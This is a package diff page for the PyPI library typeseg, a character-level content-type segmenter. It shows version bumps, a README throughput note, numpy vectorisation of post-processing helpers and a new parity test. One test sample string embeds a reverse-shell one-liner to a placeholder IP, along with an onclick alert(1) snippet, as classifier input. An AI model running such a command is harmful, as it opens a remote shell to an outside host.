PyPI - typeseg - Versions diffs - 0.2.2__tar.gz → 0.2.4__tar.gz - Mend

typeseg 0.2.2tar.gz → 0.2.4tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (33) hide show

{typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: typeseg
-Version: 0.2.2
+Version: 0.2.4
 Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
 Author: Martin Dallinger
 License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/README.md RENAMED Viewed

@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml RENAMED Viewed

@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "typeseg"
-version = "0.2.2"
+version = "0.2.4"
 description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
 readme = "README.md"
 license = "Apache-2.0"

typeseg-0.2.4/tests/test_postprocess_parity.py ADDED Viewed

@@ -0,0 +1,139 @@
+"""Regression guards for the vectorised post-processing helpers.
+The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
+``build_segments``) were rewritten from per-character Python loops to vectorised
+numpy. Each must stay bit-identical to a naive reference. We also run the full
+pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
+1536-byte U-Net window (multi-window seams) and post-processing runs over long
+sequences -- the regime where the optimisations matter.
+"""
+import random
+import numpy as np
+import pytest
+import typeseg
+from typeseg import _postprocess as pp
+# --- naive references (the pre-optimisation implementations) ---------------
+def _runs_naive(labels):
+    runs = []
+    if not labels:
+        return runs
+    start = 0
+    for i in range(1, len(labels) + 1):
+        if i == len(labels) or labels[i] != labels[start]:
+            runs.append((start, i, labels[start]))
+            start = i
+    return runs
+def _relabel_naive(text, labels):
+    n = len(text)
+    if n == 0:
+        return labels
+    is_ws = [c in pp._WHITESPACE for c in text]
+    if not any(is_ws):
+        return labels
+    left, right = [-1] * n, [-1] * n
+    last = -1
+    for i in range(n):
+        if not is_ws[i]:
+            last = labels[i]
+        left[i] = last
+    last = -1
+    for i in range(n - 1, -1, -1):
+        if not is_ws[i]:
+            last = labels[i]
+        right[i] = last
+    out = list(labels)
+    for i in range(n):
+        if is_ws[i]:
+            if left[i] != -1:
+                out[i] = left[i]
+            elif right[i] != -1:
+                out[i] = right[i]
+    return out
+def _gate_naive(char_probs, labels, threshold, other_index):
+    if threshold <= 0.0 or char_probs.size == 0:
+        return labels
+    maxp = char_probs.max(axis=1)
+    return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
+# --- helper parity ---------------------------------------------------------
+def test_runs_matches_naive():
+    rng = random.Random(0)
+    for _ in range(500):
+        n = rng.randint(0, 300)
+        labels = [rng.randint(0, 4) for _ in range(n)]
+        assert pp._runs(labels) == _runs_naive(labels)
+def test_relabel_whitespace_matches_naive():
+    rng = random.Random(1)
+    alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
+    for _ in range(2000):
+        n = rng.randint(0, 60)
+        alpha = rng.choice(alphabets)
+        text = "".join(rng.choice(alpha) for _ in range(n))
+        labels = [rng.randint(0, 6) for _ in range(n)]
+        assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
+def test_confidence_gate_matches_naive():
+    rng = np.random.default_rng(2)
+    for _ in range(200):
+        n = int(rng.integers(0, 400))
+        cp = rng.random((n, 35)).astype(np.float32)
+        labels = [int(x) for x in rng.integers(0, 35, n)]
+        for thr in (0.0, 0.1, 0.3, 0.9):
+            got = pp.confidence_gate(cp, list(labels), thr, 35)
+            assert got == _gate_naive(cp, list(labels), thr, 35)
+            if thr > 0 and n > 0:  # gated path returns Python ints (not numpy scalars)
+                assert all(isinstance(x, int) for x in got)
+# --- full pipeline on looped samples (multi-window) ------------------------
+SAMPLES = [
+    '.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
+    "UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
+    '{\n  "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n  "page": 1\n}',
+    "# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
+    "FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
+]
+@pytest.mark.parametrize("k", [1, 4, 16])
+@pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
+def test_pipeline_consistent_on_looped_samples(fn, k):
+    for s in SAMPLES:
+        text = s * k
+        r = fn(text)
+        n = len(text)
+        # per-char arrays line up with the text length
+        assert len(r.char_labels) == n
+        assert len(r.char_confidence) == n
+        assert r.char_probs.shape == (n, len(r.labels))
+        # segments tile the whole text contiguously, no gaps/overlaps
+        assert r.segments[0].start == 0
+        assert r.segments[-1].end == n
+        for a, b in zip(r.segments, r.segments[1:]):
+            assert a.end == b.start
+        # each segment's label matches the per-char labels it covers
+        for seg in r.segments:
+            assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
+def test_pipeline_deterministic_when_looped():
+    for fn in (typeseg.fast, typeseg.precise):
+        text = SAMPLES[0] * 8
+        a, b = fn(text), fn(text)
+        assert a.char_labels == b.char_labels
+        assert [s.label for s in a.segments] == [s.label for s in b.segments]

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py RENAMED Viewed

@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
 def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
-    runs: List[Tuple[int, int, int]] = []
-    if not labels:
-        return runs
-    start = 0
-    for i in range(1, len(labels) + 1):
-        if i == len(labels) or labels[i] != labels[start]:
-            runs.append((start, i, labels[start]))
-            start = i
-    return runs
+    # Contiguous equal-label spans. Vectorised: the change points are where adjacent
+    # labels differ. This is called once per post-processing pass over the full
+    # sequence, so the pure-Python scan (with its per-iteration len()) dominated the
+    # pipeline; np.diff finds the boundaries in C. Output is identical.
+    n = len(labels)
+    if n == 0:
+        return []
+    arr = np.asarray(labels)
+    cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
+    starts = [0, *cuts.tolist()]
+    ends = [*cuts.tolist(), n]
+    return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
 def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
     n = len(text)
     if n == 0:
         return labels
-    is_ws = [c in _WHITESPACE for c in text]
-    if not any(is_ws):
+    ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
+    if not ws.any():
         return labels
-    left = [-1] * n
-    right = [-1] * n
-    last = -1
-    for i in range(n):
-        if not is_ws[i]:
-            last = labels[i]
-        left[i] = last
-    last = -1
-    for i in range(n - 1, -1, -1):
-        if not is_ws[i]:
-            last = labels[i]
-        right[i] = last
-    out = list(labels)
-    for i in range(n):
-        if is_ws[i]:
-            if left[i] != -1:
-                out[i] = left[i]
-            elif right[i] != -1:
-                out[i] = right[i]
-    return out
+    labels_arr = np.asarray(labels)
+    pos = np.arange(n)
+    # left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
+    # the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
+    # running min. A whitespace char takes its left host's label, else the right's.
+    left_src = np.maximum.accumulate(np.where(ws, -1, pos))
+    right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
+    src = np.where(left_src >= 0, left_src, right_src)        # prefer left, fall back right
+    take = ws & (src < n)                                     # leave ws with no host at all
+    out = labels_arr.copy()
+    out[take] = labels_arr[src[take]]
+    return out.tolist()
 def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
     if threshold <= 0.0 or char_probs.size == 0:
         return labels
     maxp = char_probs.max(axis=1)
-    return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
+    return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
 def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
             if cur_score is None:
                 cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
             best_start, best_end, best_score = cur_start, cur_end, cur_score
+            n_text = len(text)
             for ls in range(-max_shift, max_shift + 1):
                 cs = cur_start + ls
                 if cs < left_run[0] or cs >= cur_end:
                     continue
+                # The wrap is valid only if text[cs-1] opens a pair; its required
+                # closing char is fixed by the left shift, so resolve it once here
+                # instead of calling _matching_wrap for every (ls, rs) combination.
+                close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
+                if close_needed is None:
+                    continue
                 for rs in range(-max_shift, max_shift + 1):
                     ce = cur_end + rs
                     if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
                         continue
-                    if not _matching_wrap(text[cs - 1] if cs > 0 else "",
-                                          text[ce] if ce < len(text) else ""):
+                    if (text[ce] if ce < n_text else "") != close_needed:
                         continue
                     sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
                     if sc is not None and sc > best_score + 1e-6:
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
 def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
                    label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
     n = len(text)
-    char_conf: List[float] = []
-    char_label_names: List[str] = []
-    for i in range(n):
-        lab = labels[i]
-        if char_probs.size:
-            known_max = float(char_probs[i].max())
-            conf = (1.0 - known_max) if lab == other_index else float(char_probs[i, lab])
-        else:
-            conf = 0.0
-        char_conf.append(conf)
-        char_label_names.append(other_label if lab == other_index else label_names[lab])
+    # Per-char confidence, vectorised. `other` (no probability column) scores
+    # 1 - max(known); every other label scores its own column. The old per-char
+    # `char_probs[i].max()` Python loop did n separate numpy reductions and was the
+    # bottleneck of the whole pipeline -- this is the same result in two reductions.
+    if char_probs.size:
+        lab_arr = np.asarray(labels, dtype=np.intp)
+        is_other = lab_arr == other_index
+        known_max = char_probs.max(axis=1)                               # (n,)
+        safe_lab = np.where(is_other, 0, lab_arr)                        # avoid OOB at other_index
+        picked = char_probs[np.arange(n), safe_lab]                      # (n,) chosen-label prob
+        conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
+    else:
+        conf_arr = np.zeros(n, dtype=np.float64)
+    char_conf: List[float] = conf_arr.tolist()
+    char_label_names: List[str] = [
+        other_label if lab == other_index else label_names[lab] for lab in labels
+    ]
     segments: List[Segment] = []
     for s, e, lab in _runs(labels):
         name = other_label if lab == other_index else label_names[lab]
-        conf = float(np.mean(char_conf[s:e])) if e > s else 0.0
+        conf = float(conf_arr[s:e].mean()) if e > s else 0.0
         segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
     return segments, char_label_names, char_conf

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: typeseg
-Version: 0.2.2
+Version: 0.2.4
 Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
 Author: Martin Dallinger
 License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
 the interactive viewer also applies. The viewer has further heuristics
 (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
 `viewers/core.py` for those.
+These passes are cheap, but on long inputs they run on the CPU and can outweigh the
+model's own forward pass — so the highest throughput is with post-processing off,
+exposing the raw per-character argmax:
+```python
+raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
+              min_run_normalize=False, paired_delimiter_fill=False)
+result = precise(text, raw)
+```
+The trade-off is noisier segments (single-character runs, frayed boundaries); the
+default keeps post-processing on for cleaner, deployment-style output.

{typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt RENAMED Viewed

@@ -3,6 +3,7 @@ README.md
 pyproject.toml
 tests/test_cupy_parity.py
 tests/test_distribution.py
+tests/test_postprocess_parity.py
 tests/test_postprocess_perf.py
 typeseg/__init__.py
 typeseg/__main__.py